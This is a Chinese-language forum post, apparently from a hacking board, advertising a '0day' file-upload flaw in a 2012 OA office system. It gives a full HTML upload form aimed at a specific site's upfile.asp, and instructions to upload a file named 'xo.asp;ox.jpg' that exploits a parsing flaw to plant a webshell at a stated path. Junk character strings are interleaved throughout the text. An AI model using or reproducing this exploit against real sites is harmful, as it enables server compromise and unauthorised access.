全能OA办公系统0day OA办公系统漏洞 上传漏洞

admin

全能OA办公系统 上传漏洞
/ C) Y% l$ u' u9 P​
1 ^$ q" K' [" K, \. r系统介绍：

/ G* q$ h5 A( G. z- H5 i全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。

主要功能：
8 ]2 j  s) z+ ]* Q公司通告
工作计划
通讯助理
客户资源
我的公文
公文传阅
公共资源
$ g: I4 j% I  ~, c5 s+ p7 v资源预约
今日考勤
个人计划
个人通讯录
个人基本档案
; K9 |$ m/ u0 h7 A未读邮件
发邮件
收件夹
" I1 \; Y6 I9 a- W  o9 ?" B寄件夹
网络硬盘
网络会议
, _' k3 `, T& P+ ?( S. B& e- l网络调查
交流论坛
: t4 d/ P  Q5 [. y; z/ c
0 O( Z& e: ?1 j有兴趣测试的朋友可以下源码看看
6 J8 c! F* C4 S8 U5 q- m: Q
源码下载：
; v$ I7 ]4 C* q6 P% U
http://www.mycodes.net/30/4750.htm
! s; \* V( p- p4 m2 o' W$ a
+ v$ Y- h* q! @. q+ L: O) u% [漏洞介绍：
  l% x6 f2 i' x& E" s4 C
6 v# D% r( e' H3 K由upfile.asp上传文件漏洞引起

% x% A( A8 ]" i5 ~+ _  r测试方法：

8 ?( C$ M3 \: l( L1 A& m% ~使用名小子上传http://www.itlynn.com/upfile.asp即可
0 Y, x' W. o' O& m$ g6 @
如果upfile.asp文件被删除不存在。

$ z. s* o2 u2 H  ?6 v- G* D  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
9 o! ]( h0 l+ W! ?' D1 W5 p
& K0 X, W$ @: F$ K: @如果存在那么将如下代码保存为upfile.html。

然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。



' w: p: d% R) w) d$ X) ]. x( u01 <table border='0' align="center" cellpadding="5">
5 T4 D3 ?7 g$ c$ l0 c# G0 X
$ b' y" S& A6 ~3 ~- t02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
) t) I# H. C5 b2 G+ c+ b' @& \
' V; G3 j$ j  ^& ^. Z/ m- k5 R  s. x03 <tr>

04             <td>报错：</td>
; {$ s- X8 i; _/ }9 |  ^
05             <td><input type='radio' name='errnumber' value='0'>

9 W0 A% o  b) @& @( `06               自动更名
5 g% t* i9 v) J) n. p, z" P
; q' v/ m. u( {+ Y$ x6 [5 Y! H0 ]07               <input type='radio' name='errnumber' value='1' checked>

08               报错方式

09               <input type='radio' name='errnumber' value='2'>

% d+ l: g/ L% J1 f$ ~10               直接覆盖</td>
$ X( D& @2 ~2 s) {  F" k4 s
11           </tr>

, w& O% k+ t# l* r1 k; }/ H12           <tr>
; Q/ s& u' g5 O
13             <td>主题：</td>
9 R8 q( _% x, P" f1 T' |! V" y  `! F
14             <td><input type='text' name='filename' size='30'></td>

15           </tr>
  I6 Y( Q0 b$ t- f8 t  e
8 o  |# r5 T) b1 T: u16           <tr>
* J( |$ B! u+ ~- s* [. R( o
, D. o6 F! l1 v* g' ]) _! }# e17             <td>文件：</td>

18             <td><input type="file"name="fruit"size="30"></td>
" A+ ?8 |7 J2 ]
$ j  j6 s+ i! G; |) [- D, ]  Q19           </tr>
( B4 K% |% l8 A( V! G3 |" x
9 ^& z! x; ^( b20           <tr>

21             <td valign='top'>简介：</td>
% V+ X$ D9 l! R- ~4 [$ M' i9 M( H: n
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
/ I$ K: i& x& a/ [8 d
23           </tr>

3 O6 h' e( R* I# |8 N1 u24   
0 g! J: h. s& J- R! m3 H
0 i& a( r# u! k! e25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>

26           </tr>

27         </form>
. g* C* P8 N! I8 ^
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
, T+ E4 @0 a; c8 R  P
8 T, C" {! b+ `: V8 L, z
# G; |3 P! U) N$ L! e
" w% h: s& p6 ?2 d4 F% Q# U上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
% G9 j- i* j& Z+ Q" l7 m1 \
此漏洞需要配合解析漏洞利用。